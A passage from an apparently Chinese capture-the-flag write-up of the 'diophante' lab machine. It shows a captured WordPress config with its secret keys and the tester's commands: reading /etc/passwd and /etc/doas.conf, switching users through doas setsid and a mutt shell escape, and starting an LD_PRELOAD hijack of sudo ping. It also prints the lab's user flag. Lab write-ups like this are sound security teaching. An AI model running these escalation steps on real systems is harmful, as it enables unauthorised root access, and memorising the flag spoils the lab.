\u00e0 utiliser par la base de donn\u00e9es lors de la cr\u00e9ation des tables. *\/\ndefine( 'DB_CHARSET', 'utf8mb4' );\n\n\/**\n * Type de collation de la base de donn\u00e9es.\n * N\u2019y touchez que si vous savez ce que vous faites.\n *\/\ndefine( 'DB_COLLATE', '' );\n\n\/**#@+\n * Cl\u00e9s uniques d\u2019authentification et salage.\n *\n * Remplacez les valeurs par d\u00e9faut par des phrases uniques !\n * Vous pouvez g\u00e9n\u00e9rer des phrases al\u00e9atoires en utilisant\n * {@link https:\/\/api.wordpress.org\/secret-key\/1.1\/salt\/ le service de cl\u00e9s secr\u00e8tes de WordPress.org}.\n * Vous pouvez modifier ces phrases \u00e0 n\u2019importe quel moment, afin d\u2019invalider tous les cookies existants.\n * Cela forcera \u00e9galement tous les utilisateurs \u00e0 se reconnecter.\n *\n * @since 2.6.0\n *\/\ndefine( 'AUTH_KEY', '#,g><LSZX0HW]D<yRmgs&Wf8TZgQ:J3]+`X6iZ1`Eq%j$jLId(g;>rFU.R]~FN:l' );\ndefine( 'SECURE_AUTH_KEY', 'OvszI?ZXB2tO=s=e;JCT{r[*[wU4HYjN]Ul;QSrnhq|M=x8fJjf4,T.ek^|t*)oE' );\ndefine( 'LOGGED_IN_KEY', '+B!0BXPa#n\/dITg~>`y1Ns|?=Kw|Ph)W!:IY!c?KB-vkmXLh.961;wkd+.i>o!>7' );\ndefine( 'NONCE_KEY', ':tF;H[_jOV,:H*~<EYS3:jCGpvHM8\/:=V{-NDl2d36\/ivnA@EFG8q7cQ%SJEW8Y3' );\ndefine( 'AUTH_SALT', 'rVEb=RPOZG]`pQm2Vv?8k$|7SS+)MshG1sI8RZN.2Plwk#J)O75d1Q%|TuE()lE$' );\ndefine( 'SECURE_AUTH_SALT', 'yg4jQXSs=[xb-Y3[!3shWt,UK3T:[+`Yi\/8{#w|r]x6#+$VIV+*4<2.&@]!3NAH8' );\ndefine( 'LOGGED_IN_SALT', 'a73Rg9qLRDaGbfEU9-y&$BY7~vLQ+gqGhAdzj8C:X d}j.GKn>5NSoC!,sPGD^ke' );\ndefine( 'NONCE_SALT', ') F1enYj2.O5.:UWZ0CS{5y~i[JZ0FRC`X_q3r0\/T?=naqS$N*weR-059*uTXXh7' );\n\/**#@-*\/\n\n\/**\n * Pr\u00e9fixe de base de donn\u00e9es pour les tables de WordPress.\n *\n * Vous pouvez installer plusieurs WordPress sur une seule base de donn\u00e9es\n * si vous leur donnez chacune un pr\u00e9fixe unique.\n * N\u2019utilisez que des chiffres, des lettres non-accentu\u00e9es, et des caract\u00e8res soulign\u00e9s !\n *\/\n$table_prefix = 'wp_';\n\n\/**\n * Pour les d\u00e9veloppeurs : le mode d\u00e9boguage de WordPress.\n *\n * En passant la valeur suivante \u00e0 "true", vous activez l\u2019affichage des\n * notifications d\u2019erreurs pendant vos essais.\n * Il est fortement recommand\u00e9 que les d\u00e9veloppeurs d\u2019extensions et\n * de th\u00e8mes se servent de WP_DEBUG dans leur environnement de\n * d\u00e9veloppement.\n *\n * Pour plus d\u2019information sur les autres constantes qui peuvent \u00eatre utilis\u00e9es\n * pour le d\u00e9boguage, rendez-vous sur le Codex.\n *\n * @link https:\/\/fr.wordpress.org\/support\/article\/debugging-in-wordpress\/\n *\/\ndefine( 'WP_DEBUG', false );\n\n\/* C\u2019est tout, ne touchez pas \u00e0 ce qui suit ! Bonne publication. *\/\n\n\/** Chemin absolu vers le dossier de WordPress. *\/\nif ( ! defined( 'ABSPATH' ) )\n define( 'ABSPATH', dirname( __FILE__ ) . '\/' );\n\n\/** R\u00e9glage des variables de WordPress et de ses fichiers inclus. *\/\nrequire_once( ABSPATH . 'wp-settings.php' );<\/code><\/pre>\n\u5f97\u5230\u4e00\u4e2a\u6570\u636e\u5e93\uff0c\u4f46\u662f\u5168\u662f\u9ed8\u8ba4\u7528\u6237\u5bc6\u7801\uff0c\u5148\u4e0d\u8fdb\u884c\u5c1d\u8bd5\u3002<\/p>\n
setsid\u5207\u6362\u7528\u6237<\/h3>\n
\u770b\u770b\u522b\u7684\uff1a<\/p>\n
(remote) www-data@diophante:\/var\/www\/html\/blog$ cat \/etc\/passwd | grep sh | cut -d: -f1\nBinary file (standard input) matches\n(remote) www-data@diophante:\/var\/www\/html\/blog$ echo $SHELL\n\/usr\/sbin\/nologin\n(remote) www-data@diophante:\/var\/www\/html\/blog$ cd \/home\n(remote) www-data@diophante:\/home$ ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Apr 7 2021 .\ndrwxr-xr-x 18 root root 4096 Apr 6 2021 ..\ndrwxr-xr-x 5 leonard leonard 4096 Apr 14 2021 leonard\ndrwxr-xr-x 5 sabine sabine 4096 Apr 8 2021 sabine\n(remote) www-data@diophante:\/home$ cd leonard\/\n(remote) www-data@diophante:\/home\/leonard$ ls -la\ntotal 44\ndrwxr-xr-x 5 leonard leonard 4096 Apr 14 2021 .\ndrwxr-xr-x 4 root root 4096 Apr 7 2021 ..\n-rw------- 1 leonard leonard 52 Apr 7 2021 .Xauthority\nlrwxrwxrwx 1 leonard leonard 9 Apr 8 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 leonard leonard 220 Apr 7 2021 .bash_logout\n-rw-r--r-- 1 leonard leonard 3526 Apr 7 2021 .bashrc\ndrwx------ 3 leonard leonard 4096 Apr 7 2021 .gnupg\ndrwxr-xr-x 3 leonard leonard 4096 Apr 7 2021 .local\n-rw-r--r-- 1 leonard leonard 807 Apr 7 2021 .profile\ndrwx------ 2 leonard leonard 4096 Apr 8 2021 .ssh\n-rw-r--r-- 1 leonard leonard 209 Apr 7 2021 .wget-hsts\n-rwx------ 1 leonard leonard 16 Apr 8 2021 user.txt\n(remote) www-data@diophante:\/home\/leonard$ cd ..\/sabine\/\n(remote) www-data@diophante:\/home\/sabine$ ls -la\ntotal 36\ndrwxr-xr-x 5 sabine sabine 4096 Apr 8 2021 .\ndrwxr-xr-x 4 root root 4096 Apr 7 2021 ..\n-rw------- 1 sabine sabine 52 Apr 7 2021 .Xauthority\nlrwxrwxrwx 1 root root 9 Apr 8 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 sabine sabine 220 Apr 6 2021 .bash_logout\n-rw-r--r-- 1 sabine sabine 3526 Apr 6 2021 .bashrc\ndrwx------ 3 sabine sabine 4096 Apr 7 2021 .gnupg\ndrwxr-xr-x 3 sabine sabine 4096 Apr 7 2021 .local\n-rw-r--r-- 1 sabine sabine 807 Apr 6 2021 .profile\ndrwx------ 2 sabine sabine 4096 Apr 14 2021 .ssh\n(remote) www-data@diophante:\/home\/sabine$ cd ~\n(remote) www-data@diophante:\/var\/www$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/mount\n\/usr\/bin\/xclip\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/bin\/doas\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/umount\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/sbin\/pppd\n(remote) www-data@diophante:\/var\/www$ find \/ -name "*doas*" 2>\/dev\/null\n\/var\/lib\/dpkg\/info\/doas.conffiles\n\/var\/lib\/dpkg\/info\/doas.md5sums\n\/var\/lib\/dpkg\/info\/doas.list\n\/etc\/pam.d\/doas\n\/etc\/doas.conf\n\/usr\/share\/doc\/doas\n\/usr\/share\/lintian\/overrides\/doas\n\/usr\/share\/man\/man5\/doas.conf.5.gz\n\/usr\/share\/man\/man1\/doas.1.gz\n\/usr\/bin\/doas\n(remote) www-data@diophante:\/var\/www$ cat \/etc\/doas.conf\npermit nopass www-data as sabine cmd \/usr\/bin\/setsid\npermit nopass sabine as leonard cmd \/usr\/bin\/mutt<\/code><\/pre>\n\u53d1\u73b0www-data<\/code>\u7528\u6237\u53ef\u4ee5\u4ee5 sabine \u8eab\u4efd\u6267\u884c setsid\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ tldr setsid \n\n Run a program in a new session if the calling process is not a process group leader.\n The created session is by default not controlled by the current terminal.\n More information: <https:\/\/manned.org\/setsid>.\n\n Run a program in a new session:\n\n setsid program\n\n Run a program in a new session discarding the resulting output and error:\n\n setsid program > \/dev\/null 2>&1\n\n Run a program creating a new process:\n\n setsid [-f|--fork] program\n\n Return the exit code of a program as the exit code of setsid when the program exits:\n\n setsid [-w|--wait] program\n\n Run a program in a new session setting the current terminal as the controlling terminal:\n\n setsid [-c|--ctty] program<\/code><\/pre>\n\u53d1\u73b0\u662f\u4e00\u4e2a\u521b\u5efa\u4f1a\u8bdd\u7684\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\/usr\/bin\/doas -u sabine \/usr\/bin\/setsid \/bin\/bash<\/code><\/pre>\n<\/div><\/p>\n\u5207\u6362\u6210\u529f\uff01\uff01\uff01\uff01<\/p>\n
mutt\u63d0\u6743\u7528\u6237<\/h3>\n
\u540c\u65f6\u6ce8\u610f\u5230\u521a\u521asabine as leonard cmd \/usr\/bin\/mutt<\/code>\uff0csabine\u4e5f\u6709\u7279\u6b8a\u6743\u9650\uff0c\u770b\u770b\u8fd9\u4e2amutt<\/code>\u662f\u5565\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ tldr mutt \n\n Command-line email client.\n More information: <http:\/\/mutt.org\/doc\/mutt.1.txt>.\n\n Open the specified mailbox:\n\n mutt -f mailbox\n\n Send an email and specify a subject and a cc recipient:\n\n mutt -s subject -c cc@example.com recipient@example.com\n\n Send an email with files attached:\n\n mutt -a file1 file2 -- recipient@example.com\n\n Specify a file to include as the message body:\n\n mutt -i path\/to\/file recipient@example.com\n\n Specify a draft file containing the header and the body of the message, in RFC 5322 format:\n\n mutt -H path\/to\/file recipient@example.com<\/code><\/pre>\n\u53d1\u73b0\u662f\u4e2a\u90ae\u4ef6\u5ba2\u6237\u7aef\uff0c\u6253\u5f00\u5148\u770b\u4e00\u4e0b\uff1a<\/p>\n
\/usr\/bin\/doas -u leonard \/usr\/bin\/mutt<\/code><\/pre>\n<\/div><\/p>\n\u538b\u6839\u770b\u4e0d\u6e05\u3002\u3002\u3002\u3002\u778e\u6309\uff0c\u8054\u60f3\u5230Orasi<\/code>\u9776\u573a\uff0c\u770b\u4e86\u4e00\u4e0b\u76f8\u5173\u547d\u4ee4\uff0c\u53d1\u73b0\uff1a<\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u8fdb\u884c\u9003\u9038\uff0c\u6309\u51e0\u4e0b esc \u518d\u6309\u51e0\u4e0b!<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u7136\u540e\/bin\/bash<\/code>\u5373\u53ef\u5207\u6362\u7528\u6237\u3002\u3002\u3002<\/p>\n<\/div><\/p>\nLD\u52ab\u6301root<\/h3>\nleonard@diophante:~$ ls -la\ntotal 48\ndrwxr-xr-x 6 leonard leonard 4096 Jun 14 04:27 .\ndrwxr-xr-x 4 root root 4096 Apr 7 2021 ..\n-rw------- 1 leonard leonard 52 Apr 7 2021 .Xauthority\nlrwxrwxrwx 1 leonard leonard 9 Apr 8 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 leonard leonard 220 Apr 7 2021 .bash_logout\n-rw-r--r-- 1 leonard leonard 3526 Apr 7 2021 .bashrc\ndrwx------ 3 leonard leonard 4096 Apr 7 2021 .gnupg\ndrwxr-xr-x 3 leonard leonard 4096 Apr 7 2021 .local\n-rw-r--r-- 1 leonard leonard 807 Apr 7 2021 .profile\ndrwx------ 2 leonard leonard 4096 Apr 8 2021 .ssh\n-rw-r--r-- 1 leonard leonard 209 Apr 7 2021 .wget-hsts\ndrwx------ 2 leonard leonard 4096 Jun 14 04:27 Mail\n-rwx------ 1 leonard leonard 16 Apr 8 2021 user.txt\nleonard@diophante:~$ cat user.txt \nThonirburarnlog\nleonard@diophante:~$ cd Mail\/\nleonard@diophante:~\/Mail$ ls -la\ntotal 8\ndrwx------ 2 leonard leonard 4096 Jun 14 04:27 .\ndrwxr-xr-x 6 leonard leonard 4096 Jun 14 04:27 ..\nleonard@diophante:~\/Mail$ cd ..\/\nleonard@diophante:~$ sudo -l\nMatching Defaults entries for leonard on diophante:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, env_keep+=LD_PRELOAD\n\nUser leonard may run the following commands on diophante:\n (ALL : ALL) NOPASSWD: \/usr\/bin\/ping<\/code><\/pre>\n\u6ce8\u610f\u5230env_keep+=LD_PRELOAD<\/code>\uff0c\u610f\u601d\u662f\u4e5f\u4f1a\u4fdd\u5b58\u6211\u4eec\u6307\u5b9a\u7684\u52a8\u6001\u94fe\u63a5\u5e93\uff0c\u5c1d\u8bd5\u8fdb\u884c\u52ab\u6301\uff0c\u5148\u770b\u770bping<\/code>\u6709\u5565\u51fd\u6570\uff1a<\/p>\nleonard@diophante:~$ ping -V\nping utility, iputils-s20180629<\/code><\/pre>\n\u627e\u5230\u5f53\u65f6\u7684\u90a3\u4e2a\u7248\u672c\uff0c\u4e0b\u8f7d\u4e0b\u6765\uff0c\u770b\u770b\u6e90\u4ee3\u7801\u6709\u4e9b\u5565\uff1ahttps:\/\/github.com\/iputils\/iputils\/releases\/tag\/s20180629<\/a><\/p>\n
![\"image-20250614093635581\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116108.png\")
<\/div><\/p>\n![\"image-20250614095547471\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116109.png\")
<\/div><\/p>\n![\"image-20250614100554057\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116110.png\")
<\/div><\/p>\n![\"image-20250614101633797\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116111.png\")
<\/div><\/p>\n![\"image-20250614102411431\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116112.png\")
<\/div><\/p>\n![\"image-20250614102747936\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116113.png\")
<\/div><\/p>\n![\"image-20250614103157664\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116114.png\")
<\/div><\/p>\n![\"image-20250614103249412\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116115.png\")
<\/div><\/p>\n![\"image-20250614103336715\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116116.png\")
<\/div><\/p>\n![\"image-20250614104742417\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116117.png\")
<\/div><\/p>\n![\"image-20250614111327780\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116118.png\")
<\/div><\/p>\n![\"image-20250614111540899\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506141116119.png\")
<\/div><\/p>\n